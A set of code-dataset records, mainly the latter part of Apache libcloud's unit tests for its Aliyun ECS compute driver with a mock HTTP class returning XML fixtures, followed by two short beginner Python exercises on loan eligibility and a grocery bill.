self.driver.list_volume_snapshots(self.fake_volume)\n self.assertEqual(1, len(snapshots))\n\n def test_list_volume_snapshots_with_ex_snapshot_ids(self):\n ECSMockHttp.type = \"list_volume_snapshots_ex_snapshot_ids\"\n ex_snapshot_ids = [\"fake-snapshot1\"]\n self.driver.list_volume_snapshots(self.fake_volume, ex_snapshot_ids=ex_snapshot_ids)\n\n def test_list_volume_snapshots_with_ex_filters(self):\n ECSMockHttp.type = \"list_volume_snapshots_ex_filters\"\n ex_filters = {\"InstanceId\": self.fake_node.id}\n self.driver.list_volume_snapshots(self.fake_volume, ex_filters=ex_filters)\n\n def test_create_volume(self):\n ECSMockHttp.type = \"create_volume\"\n self.volume_size = 1\n self.volume_name = \"fake-volume-name\"\n self.description = \"fake-description\"\n self.disk_category = \"system\"\n self.client_token = \"client_token\"\n volume = self.driver.create_volume(\n self.volume_size,\n self.volume_name,\n snapshot=self.fake_snapshot,\n ex_zone_id=self.zone,\n ex_description=self.description,\n 
ex_disk_category=self.disk_category,\n ex_client_token=self.client_token,\n )\n self.assertIsNotNone(volume)\n\n def test_create_volume_without_ex_zone_id_exception(self):\n self.assertRaises(AttributeError, self.driver.create_volume, 1, \"fake-volume-name\")\n\n def test_create_volume_snapshot(self):\n ECSMockHttp.type = \"create_volume_snapshot\"\n self.snapshot_name = \"fake-snapshot1\"\n self.description = \"fake-description\"\n self.client_token = \"client-token\"\n snapshot = self.driver.create_volume_snapshot(\n self.fake_volume,\n name=self.snapshot_name,\n ex_description=self.description,\n ex_client_token=self.client_token,\n )\n self.assertIsNotNone(snapshot)\n\n def test_attach_volume(self):\n self.device = \"/dev/sdb\"\n self.delete_with_instance = True\n attached = self.driver.attach_volume(\n self.fake_node,\n self.fake_volume,\n device=self.device,\n ex_delete_with_instance=self.delete_with_instance,\n )\n self.assertTrue(attached)\n\n def test_detach_volume(self):\n self.instance_id = \"fake-node1\"\n result = self.driver.detach_volume(self.fake_volume, ex_instance_id=self.instance_id)\n self.assertTrue(result)\n\n def test_detach_volume_query_instance_id(self):\n ECSMockHttp.type = \"detach_volume\"\n result = self.driver.detach_volume(self.fake_volume)\n self.assertTrue(result)\n\n def test_detach_volume_query_instance_id_exception(self):\n self.assertRaises(AttributeError, self.driver.detach_volume, self.fake_volume)\n\n def test_destroy_volume(self):\n ECSMockHttp.type = \"destroy_volume\"\n result = self.driver.destroy_volume(self.fake_volume)\n self.assertTrue(result)\n\n def test_destroy_volume_query_volumes_exception(self):\n self.assertRaises(LibcloudError, self.driver.destroy_volume, self.fake_volume)\n\n def test_destroy_volume_state_exception(self):\n ECSMockHttp.type = \"destroy_volume_state\"\n self.assertRaises(LibcloudError, self.driver.destroy_volume, self.fake_volume)\n\n def test_destroy_volume_snapshot(self):\n result = self.driver.destroy_volume_snapshot(self.fake_snapshot)\n self.assertTrue(result)\n\n def test_destroy_volume_snapshot_exception(self):\n self.assertRaises(AttributeError, self.driver.destroy_volume_snapshot, self.fake_volume)\n\n def test_list_images(self):\n images = self.driver.list_images(self.fake_location)\n self.assertEqual(1, len(images))\n image = images[0]\n self.assertEqual(\"freebsd1001_64_20G_aliaegis_20150527.vhd\", image.id)\n self.assertEqual(\"freebsd1001_64_20G_aliaegis_20150527.vhd\", image.name)\n expected_extra = {\n \"image_version\": \"1.0.0\",\n \"os_type\": \"linux\",\n \"platform\": \"Freebsd\",\n \"architecture\": \"x86_64\",\n \"description\": \"freebsd1001_64_20G_aliaegis_20150527.vhd\",\n \"size\": 20,\n \"image_owner_alias\": \"system\",\n \"os_name\": \"FreeBSD 10.1 64位\",\n \"product_code\": \"\",\n \"is_subscribed\": False,\n \"progress\": \"100%\",\n \"creation_time\": \"2015-06-19T07:25:42Z\",\n \"usage\": \"instance\",\n \"is_copied\": False,\n }\n self._validate_extras(expected_extra, image.extra)\n expected_dev_mappings = {\n \"snapshot_id\": \"\",\n \"size\": 20,\n \"device\": \"/dev/xvda\",\n \"format\": \"\",\n \"import_oss_bucket\": \"\",\n \"import_oss_object\": \"\",\n }\n self._validate_extras(expected_dev_mappings, image.extra[\"disk_device_mappings\"])\n\n def test_list_images_with_ex_image_ids(self):\n ECSMockHttp.type = \"list_images_ex_image_ids\"\n self.driver.list_images(\n location=self.fake_location,\n ex_image_ids=[self.fake_image.id, \"not-existed\"],\n )\n\n def 
test_list_images_with_ex_image_ids_type_exception(self):\n        self.assertRaises(\n            AttributeError,\n            self.driver.list_images,\n            location=self.fake_location,\n            ex_image_ids={\"image_ids\": \"id1,id2\"},\n        )\n\n    def test_list_images_with_ex_filters(self):\n        ECSMockHttp.type = \"list_images_ex_filters\"\n        ex_filters = {\"Status\": \"Available\"}\n        self.driver.list_images(location=self.fake_location, ex_filters=ex_filters)\n\n    def test_list_images_multiple_pages(self):\n        ECSMockHttp.type = \"list_images_pages\"\n        images = self.driver.list_images()\n        self.assertEqual(2, len(images))\n\n    def test_create_image(self):\n        self.image_name = \"fake-image1\"\n        self.description = \"description\"\n        self.image_version = \"1.0.0\"\n        self.client_token = \"client_token\"\n        image = self.driver.create_image(\n            None,\n            self.image_name,\n            self.description,\n            ex_snapshot_id=self.fake_snapshot.id,\n            ex_image_version=self.image_version,\n            ex_client_token=self.client_token,\n        )\n        self.assertIsNotNone(image)\n\n    def test_create_image_exception(self):\n        self.assertRaises(AttributeError, self.driver.create_image, None, None)\n\n    def test_delete_image(self):\n        result = self.driver.delete_image(self.fake_image)\n        self.assertTrue(result)\n\n    def test_get_image(self):\n        ECSMockHttp.type = \"get_image\"\n        image = self.driver.get_image(self.fake_image.id)\n        self.assertIsNotNone(image)\n\n    def test_get_image_not_found_exception(self):\n        ECSMockHttp.type = \"get_image_not_found\"\n        self.assertRaises(LibcloudError, self.driver.get_image, self.fake_image.id)\n\n    def test_copy_image(self):\n        self.image_name = \"copied-image1\"\n        self.description = \"description\"\n        self.dest_region = \"cn-hangzhou\"\n        self.client_token = \"client-token\"\n        image = self.driver.copy_image(\n            self.region,\n            self.fake_image,\n            self.image_name,\n            description=self.description,\n            ex_destination_region_id=self.dest_region,\n            ex_client_token=self.client_token,\n        )\n        self.assertIsNotNone(image)\n\n    def test_copy_image_in_the_same_region(self):\n        ECSMockHttp.type = \"copy_image_same_region\"\n        image = self.driver.copy_image(self.region, self.fake_image, None)\n        self.assertIsNotNone(image)\n\n    def test_ex_create_security_group(self):\n        self.sg_description = \"description\"\n        self.client_token = \"client-token\"\n        sg_id = self.driver.ex_create_security_group(\n            description=self.sg_description, client_token=self.client_token\n        )\n        self.assertEqual(\"sg-F876FF7BA\", sg_id)\n\n    def test_ex_list_security_groups(self):\n        sgs = self.driver.ex_list_security_groups()\n        self.assertEqual(1, len(sgs))\n        sg = sgs[0]\n        self.assertEqual(\"sg-28ou0f3xa\", sg.id)\n        self.assertEqual(\"sg-28ou0f3xa\", sg.name)\n        self.assertEqual(\"System created security group.\", sg.description)\n        self.assertEqual(\"\", sg.vpc_id)\n        self.assertEqual(\"2015-06-26T08:35:30Z\", sg.creation_time)\n\n    def test_ex_join_security_group(self):\n        result = self.driver.ex_join_security_group(\n            self.fake_node, group_id=self.fake_security_group_id\n        )\n        self.assertTrue(result)\n\n    def test_ex_leave_security_group(self):\n        result = self.driver.ex_leave_security_group(\n            self.fake_node, group_id=self.fake_security_group_id\n        )\n        self.assertTrue(result)\n\n    def test_ex_delete_security_group_by_id(self):\n        result = self.driver.ex_delete_security_group_by_id(group_id=self.fake_security_group_id)\n        self.assertTrue(result)\n\n    def test_ex_modify_security_group_by_id(self):\n        self.sg_name = \"name\"\n        self.sg_description = \"description\"\n        result = self.driver.ex_modify_security_group_by_id(\n            
group_id=self.fake_security_group_id,\n name=self.sg_name,\n description=self.sg_description,\n )\n self.assertTrue(result)\n\n def test_ex_list_security_groups_with_ex_filters(self):\n ECSMockHttp.type = \"list_sgs_filters\"\n self.vpc_id = \"vpc1\"\n ex_filters = {\"VpcId\": self.vpc_id}\n sgs = self.driver.ex_list_security_groups(ex_filters=ex_filters)\n self.assertEqual(1, len(sgs))\n\n def test_ex_list_security_group_attributes(self):\n self.sga_nictype = \"internet\"\n sgas = self.driver.ex_list_security_group_attributes(\n group_id=self.fake_security_group_id, nic_type=self.sga_nictype\n )\n self.assertEqual(1, len(sgas))\n sga = sgas[0]\n self.assertEqual(\"ALL\", sga.ip_protocol)\n self.assertEqual(\"-1/-1\", sga.port_range)\n self.assertEqual(\"Accept\", sga.policy)\n self.assertEqual(\"internet\", sga.nic_type)\n\n def test_ex_list_zones(self):\n zones = self.driver.ex_list_zones()\n self.assertEqual(1, len(zones))\n zone = zones[0]\n self.assertEqual(\"cn-qingdao-b\", zone.id)\n self.assertEqual(self.driver, zone.driver)\n self.assertEqual(\"青岛可用区B\", zone.name)\n self.assertIsNotNone(zone.available_resource_types)\n self.assertEqual(\"IoOptimized\", zone.available_resource_types[0])\n self.assertIsNotNone(zone.available_instance_types)\n self.assertEqual(\"ecs.m2.medium\", zone.available_instance_types[0])\n self.assertIsNotNone(zone.available_disk_categories)\n self.assertEqual(\"cloud_ssd\", zone.available_disk_categories[0])\n\n\nclass ECSMockHttp(MockHttp):\n fixtures = ComputeFileFixtures(\"ecs\")\n\n def _DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_nodes_ex_node_ids_DescribeInstances(self, method, url, body, headers):\n params = {\"InstanceIds\": '[\"i-28n7dkvov\", \"not-existed-id\"]'}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeInstances(method, url, body, headers)\n\n def _list_nodes_ex_filters_DescribeInstances(self, method, url, body, headers):\n params = {\"ZoneId\": self.test.zone}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeInstances(method, url, body, headers)\n\n def _DescribeInstanceTypes(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_instance_types.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DescribeRegions(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_regions.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_CreateInstance(self, method, url, body, headers):\n params = {\n \"SecurityGroupId\": \"sg-28ou0f3xa\",\n \"Description\": \"description\",\n \"InternetChargeType\": \"PayByTraffic\",\n \"InternetMaxBandwidthOut\": \"1\",\n \"InternetMaxBandwidthIn\": \"200\",\n \"HostName\": \"hostname\",\n \"Password\": \"password\",\n \"IoOptimized\": \"optimized\",\n \"SystemDisk.Category\": \"cloud\",\n \"SystemDisk.DiskName\": \"root\",\n \"SystemDisk.Description\": \"sys\",\n \"VSwitchId\": \"vswitch-id1\",\n \"PrivateIpAddress\": \"1.1.1.2\",\n \"ClientToken\": \"client_token\",\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"create_node_describe_instances.xml\")\n return 
(httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_StartInstance(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"start_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_with_data_CreateInstance(self, method, url, body, headers):\n params = {\n \"SecurityGroupId\": \"sg-28ou0f3xa\",\n \"DataDisk.1.Size\": \"5\",\n \"DataDisk.1.Category\": \"cloud\",\n \"DataDisk.1.DiskName\": \"data1\",\n \"DataDisk.1.Description\": \"description\",\n \"DataDisk.1.Device\": \"/dev/xvdb\",\n \"DataDisk.1.DeleteWithInstance\": \"true\",\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_with_data_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"create_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_node_with_data_StartInstance(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"start_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _reboot_node_RebootInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id, \"ForceStop\": \"false\"})\n resp_body = self.fixtures.load(\"reboot_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _reboot_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"reboot_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _reboot_node_force_stop_RebootInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id, \"ForceStop\": \"true\"})\n resp_body = self.fixtures.load(\"reboot_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _reboot_node_force_stop_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"reboot_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"destroy_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_node_DeleteInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id})\n resp_body = self.fixtures.load(\"delete_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _start_node_StartInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id})\n resp_body = self.fixtures.load(\"start_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _start_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"reboot_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _stop_node_StopInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id, \"ForceStop\": 
\"false\"})\n resp_body = self.fixtures.load(\"stop_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _stop_node_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"stop_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _stop_node_force_stop_StopInstance(self, method, url, body, headers):\n node_id = self.test.fake_node.id\n self.assertUrlContainsQueryParams(url, {\"InstanceId\": node_id, \"ForceStop\": \"true\"})\n resp_body = self.fixtures.load(\"stop_instance.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _stop_node_force_stop_DescribeInstances(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"stop_node_describe_instances.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DescribeDisks(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_disks.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_volumes_ex_volume_ids_DescribeDisks(self, method, url, body, headers):\n region = self.test.region\n params = {\"DiskIds\": '[\"i-28n7dkvov\", \"not-existed-id\"]', \"RegionId\": region}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeInstances(method, url, body, headers)\n\n def _list_volumes_ex_filters_DescribeDisks(self, method, url, body, headers):\n params = {\"InstanceId\": self.test.fake_node.id}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeDisks(method, url, body, headers)\n\n def _DescribeSnapshots(self, method, url, body, headers):\n region = self.test.region\n volume_id = self.test.fake_volume.id\n params = {\"RegionId\": region, \"DiskId\": volume_id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_snapshots.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_volume_snapshots_ex_snapshot_ids_DescribeSnapshots(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region, \"SnapshotIds\": '[\"fake-snapshot1\"]'}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeSnapshots(method, url, body, headers)\n\n def _list_volume_snapshots_ex_filters_DescribeSnapshots(self, method, url, body, headers):\n params = {\"InstanceId\": self.test.fake_node.id}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeSnapshots(method, url, body, headers)\n\n def _create_volume_CreateDisk(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"DiskName\": self.test.volume_name,\n \"Size\": str(self.test.volume_size),\n \"ZoneId\": self.test.zone,\n \"SnapshotId\": self.test.fake_snapshot.id,\n \"Description\": self.test.description,\n \"DiskCategory\": self.test.disk_category,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_volume_DescribeDisks(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"create_volume_describe_disks.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_volume_snapshot_CreateSnapshot(self, method, url, body, headers):\n params = {\n \"DiskId\": self.test.fake_volume.id,\n \"SnapshotName\": self.test.snapshot_name,\n \"Description\": 
self.test.description,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_snapshot.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _create_volume_snapshot_DescribeSnapshots(self, method, url, body, headers):\n resp_body = self.fixtures.load(\"describe_snapshots.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _AttachDisk(self, method, url, body, headers):\n delete_with_instance = str(self.test.delete_with_instance).lower()\n params = {\n \"InstanceId\": self.test.fake_node.id,\n \"DiskId\": self.test.fake_volume.id,\n \"Device\": self.test.device,\n \"DeleteWithInstance\": delete_with_instance,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"attach_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DetachDisk(self, method, url, body, headers):\n params = {\n \"DiskId\": self.test.fake_volume.id,\n \"InstanceId\": self.test.instance_id,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"detach_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _detach_volume_DescribeDisks(self, method, url, body, headers):\n params = {\"DiskIds\": '[\"' + self.test.fake_volume.id + '\"]'}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"detach_volume_describe_disks.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _detach_volume_DetachDisk(self, method, url, body, headers):\n params = {\"DiskId\": self.test.fake_volume.id, \"InstanceId\": \"i-28whl2nj2\"}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"detach_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_volume_DescribeDisks(self, method, url, body, headers):\n params = {\"DiskIds\": '[\"' + self.test.fake_volume.id + '\"]'}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"destroy_volume_describe_disks.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_volume_DeleteDisk(self, method, url, body, headers):\n params = {\"DiskId\": self.test.fake_volume.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"delete_disk.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _destroy_volume_state_DescribeDisks(self, method, url, body, headers):\n return self._detach_volume_DescribeDisks(method, url, body, headers)\n\n def _DeleteSnapshot(self, method, url, body, header):\n params = {\"SnapshotId\": self.test.fake_snapshot.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"delete_snapshot.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DescribeImages(self, method, url, body, headers):\n params = {\"RegionId\": self.test.fake_location.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_images.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _list_images_pages_DescribeImages(self, method, url, body, headers):\n if \"PageNumber=2\" in url:\n resp_body = self.fixtures.load(\"pages_describe_images_page2.xml\")\n else:\n resp_body = self.fixtures.load(\"pages_describe_images.xml\")\n return (httplib.OK, resp_body, {}, 
httplib.responses[httplib.OK])\n\n def _list_images_ex_image_ids_DescribeImages(self, method, url, body, headers):\n params = {\"ImageId\": self.test.fake_image.id + \",not-existed\"}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeImages(method, url, body, headers)\n\n def _list_images_ex_filters_DescribeImages(self, method, url, body, headers):\n params = {\"Status\": \"Available\"}\n self.assertUrlContainsQueryParams(url, params)\n return self._DescribeImages(method, url, body, headers)\n\n def _CreateImage(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"ImageName\": self.test.image_name,\n \"Description\": self.test.description,\n \"SnapshotId\": self.test.fake_snapshot.id,\n \"ImageVersion\": self.test.image_version,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"create_image.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _DeleteImage(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region, \"ImageId\": self.test.fake_image.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"delete_image.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _get_image_DescribeImages(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region, \"ImageId\": self.test.fake_image.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_images.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _get_image_not_found_DescribeImages(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region, \"ImageId\": self.test.fake_image.id}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"get_image_describe_images.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _CopyImage(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"ImageId\": self.test.fake_image.id,\n \"DestinationRegionId\": self.test.dest_region,\n \"DestinationImageName\": self.test.image_name,\n \"DestinationDescription\": self.test.description,\n \"ClientToken\": self.test.client_token,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"copy_image.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _copy_image_same_region_CopyImage(self, method, url, body, headers):\n params = {\n \"RegionId\": self.test.region,\n \"ImageId\": self.test.fake_image.id,\n \"DestinationRegionId\": self.test.region,\n }\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"copy_image.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _copy_image_same_region_DescribeImages(self, method, url, body, headers):\n return self._DescribeImages(method, url, body, headers)\n\n def _DescribeSecurityGroups(self, method, url, body, headers):\n params = {\"RegionId\": self.test.region}\n self.assertUrlContainsQueryParams(url, params)\n resp_body = self.fixtures.load(\"describe_security_groups.xml\")\n return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n def _JoinSecurityGroup(self, method, url, body, headers):\n params = {\n \"InstanceId\": self.test.fake_node.id,\n \"SecurityGroupId\": self.test.fake_security_group_id,\n }\n self.assertUrlContainsQueryParams(url, params)\n 
body = self.fixtures.load(\"join_security_group_by_id.xml\")\n        return (httplib.OK, body, {}, httplib.responses[httplib.OK])\n\n    def _LeaveSecurityGroup(self, method, url, body, headers):\n        params = {\n            \"InstanceId\": self.test.fake_node.id,\n            \"SecurityGroupId\": self.test.fake_security_group_id,\n        }\n        self.assertUrlContainsQueryParams(url, params)\n        body = self.fixtures.load(\"leave_security_group_by_id.xml\")\n        return (httplib.OK, body, {}, httplib.responses[httplib.OK])\n\n    def _list_sgs_filters_DescribeSecurityGroups(self, method, url, body, headers):\n        params = {\"VpcId\": self.test.vpc_id}\n        self.assertUrlContainsQueryParams(url, params)\n        return self._DescribeSecurityGroups(method, url, body, headers)\n\n    def _CreateSecurityGroup(self, method, url, body, headers):\n        params = {\n            \"RegionId\": self.test.region,\n            \"Description\": self.test.sg_description,\n            \"ClientToken\": self.test.client_token,\n        }\n        self.assertUrlContainsQueryParams(url, params)\n        resp_body = self.fixtures.load(\"create_security_group.xml\")\n        return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n    def _DeleteSecurityGroup(self, method, url, body, headers):\n        params = {\n            \"RegionId\": self.test.region,\n            \"SecurityGroupId\": self.test.fake_security_group_id,\n        }\n        self.assertUrlContainsQueryParams(url, params)\n        resp_body = self.fixtures.load(\"delete_security_group_by_id.xml\")\n        return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n    def _ModifySecurityGroupAttribute(self, method, url, body, headers):\n        params = {\n            \"RegionId\": self.test.region,\n            \"SecurityGroupId\": self.test.fake_security_group_id,\n            \"SecurityGroupName\": self.test.sg_name,\n            \"Description\": self.test.sg_description,\n        }\n        self.assertUrlContainsQueryParams(url, params)\n        resp_body = self.fixtures.load(\"modify_security_group_by_id.xml\")\n        return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n    def _DescribeSecurityGroupAttribute(self, method, url, body, headers):\n        params = {\n            \"RegionId\": self.test.region,\n            \"SecurityGroupId\": self.test.fake_security_group_id,\n            \"NicType\": self.test.sga_nictype,\n        }\n        self.assertUrlContainsQueryParams(url, params)\n        resp_body = self.fixtures.load(\"describe_security_group_attributes.xml\")\n        return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n    def _DescribeZones(self, method, url, body, headers):\n        resp_body = self.fixtures.load(\"describe_zones.xml\")\n        return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n    def _create_public_ip_AllocatePublicIpAddress(self, method, url, body, headers):\n        resp_body = self.fixtures.load(\"create_public_ip.xml\")\n        return (httplib.OK, resp_body, {}, httplib.responses[httplib.OK])\n\n\nif __name__ == \"__main__\":\n    sys.exit(unittest.main())\n","repo_name":"apache/libcloud","sub_path":"libcloud/test/compute/test_ecs.py","file_name":"test_ecs.py","file_ext":"py","file_size_in_byte":44872,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"74018541228","text":"'''\n09 - Read a worker's salary and the value of a loan installment. If the installment\nis greater than 20% of the salary print: Loan not granted; otherwise print: Loan granted.\n'''\n\nsal = float(input('Salary: '))\nparc = float(input('Installment: '))\n\nporcent = sal * 20 / 100\n\nprint(f'20% of the given salary is R$ {porcent:.0f}')\n\nif porcent >= parc:\n    print('Loan granted')\nelse:\n    print('Loan not granted')","repo_name":"Leownhart/My_Course_of_python","sub_path":"Geek University/Seção 5/Exercicios/EX09.py","file_name":"EX09.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
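A quick worked example of the 20% rule above (illustrative numbers only, not part of the original exercise): for a salary of R$ 2000.00 the threshold is 2000 * 20 / 100 = R$ 400.00, so an installment of R$ 350.00 prints "Loan granted" while one of R$ 500.00 prints "Loan not granted".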
+{"seq_id":"1266487949","text":"#While you loop through each item of food, only add the\n#price of the item to total if the item's stock count is greater than zero.\n\n#If the item is in stock, then after you add the price to the total,\n#subtract one from the item's stock count.\n\nshopping_list = [\"banana\", \"orange\", \"apple\"]\n\nstock = {\n    \"banana\": 6,\n    \"apple\": 0,\n    \"orange\": 32,\n    \"pear\": 15\n}\n \nprices = {\n    \"banana\": 4,\n    \"apple\": 2,\n    \"orange\": 1.5,\n    \"pear\": 3\n}\n\ndef compute_bill(food):\n    total = 0\n    for item in food:\n        if stock[item] > 0:\n            total += prices[item]\n            stock[item] -= 1\n    return total\n","repo_name":"chloenh/Codecademy-Python","sub_path":"stockingout-solution.py","file_name":"stockingout-solution.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
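A small usage sketch for the record above (hypothetical calls, not part of the original solution): compute_bill mutates the shared stock dict, so each call also decrements the counts of the items it sells.

# With the stock and prices defined above: banana (4) and orange (1.5)
# are in stock, apple has a count of 0 and is skipped, so the bill is 5.5.
print(compute_bill(shopping_list))  # 5.5
print(stock["banana"])              # 5 - one banana was deducted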
